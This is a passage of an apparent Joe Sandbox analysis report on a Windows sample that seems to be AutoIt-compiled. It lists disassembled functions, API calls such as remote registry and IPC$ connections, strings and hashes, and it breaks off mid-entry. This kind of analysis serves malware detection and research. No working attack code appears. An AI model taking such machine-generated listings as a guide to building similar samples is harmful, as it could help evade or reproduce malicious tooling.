                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: bf9dc7e10b339071967f89e3abca4422a683beb86a8322b555c23d9ae8b9f662
                                                                  • Instruction ID: 60244f3eb9caa6f21591de031891bf8632b4d7c9cb0d4145382b8dc65963b700
                                                                  • Opcode Fuzzy Hash: bf9dc7e10b339071967f89e3abca4422a683beb86a8322b555c23d9ae8b9f662
                                                                  • Instruction Fuzzy Hash: 09414975601204FFDB129F69EC88EAA7BBCEF89B15F108459F906D7260CB31AD41DB60
                                                                  Function 003A05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 003A076F
                                                                  • _wcscat.LIBCMT ref: 003A0787
                                                                  • _wcscat.LIBCMT ref: 003A0799
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A07AE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A07C2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 003A07DA
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 003A07F4
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: a685b5df8f792f7c4228ce2e43ef2cbf4cd6fd6603126be1e7d7bd7f44f775d3
                                                                  • Instruction ID: 2583d496f6d06d1d31fd5d91266311f4b3a701abc08df2cf83fec5f780d33469
                                                                  • Opcode Fuzzy Hash: a685b5df8f792f7c4228ce2e43ef2cbf4cd6fd6603126be1e7d7bd7f44f775d3
                                                                  • Instruction Fuzzy Hash: 7A8183715043019FCB2ADF64C84596EB7E8FBCA304F158C2EF889DB261E734E9548B92
                                                                  Function 003BEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003BEF3B
                                                                  • GetFocus.USER32 ref: 003BEF4B
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 003BEF56
                                                                  • _memset.LIBCMT ref: 003BF081
                                                                  • GetMenuItemInfoW.USER32 ref: 003BF0AC
                                                                  • GetMenuItemCount.USER32(00000000), ref: 003BF0CC
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 003BF0DF
                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003BF113
                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003BF15B
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003BF193
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003BF1C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: 1e8425997a27c3c04102928f557ff863a89ec3f394372d98d3bb3df233717e84
                                                                  • Instruction ID: c509f594fdaca10a200bcf26f8296f8f78958b2a163b7715a79e7ef05bb829c8
                                                                  • Opcode Fuzzy Hash: 1e8425997a27c3c04102928f557ff863a89ec3f394372d98d3bb3df233717e84
                                                                  • Instruction Fuzzy Hash: 7D819D70505301AFD722DF18DC84AEBBBE9FB88318F01492EFA95976A1D730D905CB92
                                                                  Function 0038A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0038ABD7
                                                                    • Part of subcall function 0038ABBB: GetLastError.KERNEL32(?,0038A69F,?,?,?), ref: 0038ABE1
                                                                    • Part of subcall function 0038ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0038A69F,?,?,?), ref: 0038ABF0
                                                                    • Part of subcall function 0038ABBB: HeapAlloc.KERNEL32(00000000,?,0038A69F,?,?,?), ref: 0038ABF7
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0038AC0E
                                                                    • Part of subcall function 0038AC56: GetProcessHeap.KERNEL32(00000008,0038A6B5,00000000,00000000,?,0038A6B5,?), ref: 0038AC62
                                                                    • Part of subcall function 0038AC56: HeapAlloc.KERNEL32(00000000,?,0038A6B5,?), ref: 0038AC69
                                                                    • Part of subcall function 0038AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0038A6B5,?), ref: 0038AC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0038A8CB
                                                                  • _memset.LIBCMT ref: 0038A8E0
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0038A8FF
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A910
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0038A94D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0038A969
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A986
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0038A995
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0038A99C
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0038A9BD
                                                                  • CopySid.ADVAPI32(00000000), ref: 0038A9C4
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0038A9F5
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0038AA1B
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0038AA2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 986279ad786489bf2fc1fd7228a02cbd773c1c0a8950386c6cdd93b2471364a2
                                                                  • Instruction ID: 413a440bf43fe700976503a1253c02b77d34d92589bb14c4baaab02d2c5aff9d
                                                                  • Opcode Fuzzy Hash: 986279ad786489bf2fc1fd7228a02cbd773c1c0a8950386c6cdd93b2471364a2
                                                                  • Instruction Fuzzy Hash: 01516071900609AFEF16EFA0DD45EEEBB79FF44300F04815AF915AB290D7349A05CB61
                                                                  Function 003A9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 003A9E36
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003A9E42
                                                                  • CreateCompatibleDC.GDI32(?), ref: 003A9E4E
                                                                  • SelectObject.GDI32(00000000,?), ref: 003A9E5B
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003A9EAF
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 003A9EEB
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003A9F0F
                                                                  • SelectObject.GDI32(00000006,?), ref: 003A9F17
                                                                  • DeleteObject.GDI32(?), ref: 003A9F20
                                                                  • DeleteDC.GDI32(00000006), ref: 003A9F27
                                                                  • ReleaseDC.USER32(00000000,?), ref: 003A9F32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: d4558e21d2cffc9bb2d3d1690bbe5d1ab7a915c590e834d76b407ec1275ab74a
                                                                  • Instruction ID: 362156d4d74aeba42bc9ba460ca684d44fbc3bcf329670001e06c37136f48847
                                                                  • Opcode Fuzzy Hash: d4558e21d2cffc9bb2d3d1690bbe5d1ab7a915c590e834d76b407ec1275ab74a
                                                                  • Instruction Fuzzy Hash: 51514C75900309EFCB16CFA8DC85EAEBBB9EF49310F14841EF959A7250C731A941CB90
                                                                  Function 0039CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-2391861430
                                                                  • Opcode ID: 0b307c858d36d81d00cf92ba13066a0b8704735aa715ac20ba5b9591ef99f0f6
                                                                  • Instruction ID: 3e75df8957fff0eac8cb897109700d94c93853cc89e1b9b2a07602229e261a46
                                                                  • Opcode Fuzzy Hash: 0b307c858d36d81d00cf92ba13066a0b8704735aa715ac20ba5b9591ef99f0f6
                                                                  • Instruction Fuzzy Hash: 4E518272800609BACF16EBE0CD42EEEBB78AF08345F104165F905760A2EB756F59DF60
                                                                  Function 0039CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-3420473620
                                                                  • Opcode ID: c5a17e2cc42e7c3bd8bb8f33ca7118fd76f644b3d511961a7985b3418fa29f03
                                                                  • Instruction ID: 3cdcba370d7cc9cd1963f02040ef33172168ce0b8bbce7134aad742cc1832adf
                                                                  • Opcode Fuzzy Hash: c5a17e2cc42e7c3bd8bb8f33ca7118fd76f644b3d511961a7985b3418fa29f03
                                                                  • Instruction Fuzzy Hash: 91519372900649BACF16EBE0CD42EEEBB78AF08345F104065F905760A2EB746F59DF61
                                                                  Function 003B3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: $E@$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-2020488321
                                                                  • Opcode ID: c0c7cea081f1878e71998f1ff7088ab97a95bdb2f4483f1c2197a75cbde18163
                                                                  • Instruction ID: 48d0717e7f83600f631554d13a77ff9ca2d11d82ef2581b35be2551f40bc0a0d
                                                                  • Opcode Fuzzy Hash: c0c7cea081f1878e71998f1ff7088ab97a95bdb2f4483f1c2197a75cbde18163
                                                                  • Instruction Fuzzy Hash: 9341927411025A9FCF02EF10DC51AEB3365AF52344F118829EE552FAA6EB74AE0ACB14
                                                                  Function 003955BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003955D7
                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00395664
                                                                  • GetMenuItemCount.USER32(00411708), ref: 003956ED
                                                                  • DeleteMenu.USER32(00411708,00000005,00000000,000000F5,?,?), ref: 0039577D
                                                                  • DeleteMenu.USER32(00411708,00000004,00000000), ref: 00395785
                                                                  • DeleteMenu.USER32(00411708,00000006,00000000), ref: 0039578D
                                                                  • DeleteMenu.USER32(00411708,00000003,00000000), ref: 00395795
                                                                  • GetMenuItemCount.USER32(00411708), ref: 0039579D
                                                                  • SetMenuItemInfoW.USER32(00411708,00000004,00000000,00000030), ref: 003957D3
                                                                  • GetCursorPos.USER32(?), ref: 003957DD
                                                                  • SetForegroundWindow.USER32(00000000), ref: 003957E6
                                                                  • TrackPopupMenuEx.USER32(00411708,00000000,?,00000000,00000000,00000000), ref: 003957F9
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00395805
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 3993528054-0
                                                                  • Opcode ID: fb7ede15187135c26cff208ecc5205824d7259993a9482ce3b6028acf8862f65
                                                                  • Instruction ID: 350e923ec252a991525403aee5cffc9b142ffc3757911fff5535eb12c01a9380
                                                                  • Opcode Fuzzy Hash: fb7ede15187135c26cff208ecc5205824d7259993a9482ce3b6028acf8862f65
                                                                  • Instruction Fuzzy Hash: F0710331645A05BEEF239F54DC49FAABF69FF00368F244206F6186A1E0C7716C90DB90
                                                                  Function 0038A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0038A1DC
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0038A211
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0038A22D
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0038A249
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0038A273
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0038A29B
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0038A2A6
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0038A2AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1687751970-22481851
                                                                  • Opcode ID: 6c59f9159e8e1b5be69266ad732d13c3f42947a390c13aabc1b5ec3904a35ab7
                                                                  • Instruction ID: fcb1f60d8aff9ef6735ec11911b6df1ed6a7f03307843d76bb14943991eecac2
                                                                  • Opcode Fuzzy Hash: 6c59f9159e8e1b5be69266ad732d13c3f42947a390c13aabc1b5ec3904a35ab7
                                                                  • Instruction Fuzzy Hash: D541FA76C10629ABDF22EBA4DC95DEDB778BF04700F00456AF801B71A1EB74AE09CB50
                                                                  Function 003967E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 003967FD
                                                                  • __swprintf.LIBCMT ref: 0039680A
                                                                    • Part of subcall function 0037172B: __woutput_l.LIBCMT ref: 00371784
                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00396834
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00396840
                                                                  • LockResource.KERNEL32(00000000), ref: 0039684D
                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 0039686D
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0039687F
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0039688E
                                                                  • LockResource.KERNEL32(?), ref: 0039689A
                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003968F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                  • String ID: 5@
                                                                  • API String ID: 1433390588-819730362
                                                                  • Opcode ID: 657859463bd80732a986593e4c668d2dbf093ff4c9367690634203551365c707
                                                                  • Instruction ID: 7bfd0e2d58b6ff1b31db809e10ada61f2adadc2a1cfab7a29668fb9e8633500e
                                                                  • Opcode Fuzzy Hash: 657859463bd80732a986593e4c668d2dbf093ff4c9367690634203551365c707
                                                                  • Instruction Fuzzy Hash: 0131707190621AABDF129F60ED56ABF7BACEF08341F008826F906E6150E734DA11DB60
                                                                  Function 003925B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003C36F4,00000010,?,Bad directive syntax error,003EDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003925D6
                                                                  • LoadStringW.USER32(00000000,?,003C36F4,00000010), ref: 003925DD
                                                                  • _wprintf.LIBCMT ref: 00392610
                                                                  • __swprintf.LIBCMT ref: 00392632
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003926A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 1080873982-4153970271
                                                                  • Opcode ID: f09a81682d26ab1166c20196ba316cf163ccb133a20f400e8210c59b2c40eb25
                                                                  • Instruction ID: a245ea2d5a1a37206df587a7a0e266f9d398b927b32a823272b9adf56866c4cc
                                                                  • Opcode Fuzzy Hash: f09a81682d26ab1166c20196ba316cf163ccb133a20f400e8210c59b2c40eb25
                                                                  • Instruction Fuzzy Hash: F2216231810219BFCF13BF90CC46FEE7B39BF18305F004466F5056A0A2DA75A618DB50
                                                                  Function 00397AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00397B42
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00397B58
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00397B69
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00397B7B
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00397B8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: SendString
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 890592661-1007645807
                                                                  • Opcode ID: 82a22cd3a57def5ddbb9ab7004aaf28c5ff2ff14c850e96e2d93d2dd51336f82
                                                                  • Instruction ID: 76435d436e4e03e88957f03593aa7e753f5761c7abb06f12a4dd8fcd99b355bf
                                                                  • Opcode Fuzzy Hash: 82a22cd3a57def5ddbb9ab7004aaf28c5ff2ff14c850e96e2d93d2dd51336f82
                                                                  • Instruction Fuzzy Hash: 891194A1A602597DDB21BB61CC4AEFFBE7CEBD1B11F10042A7811B70D1DA741A49C5B1
                                                                  Function 0039778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00397794
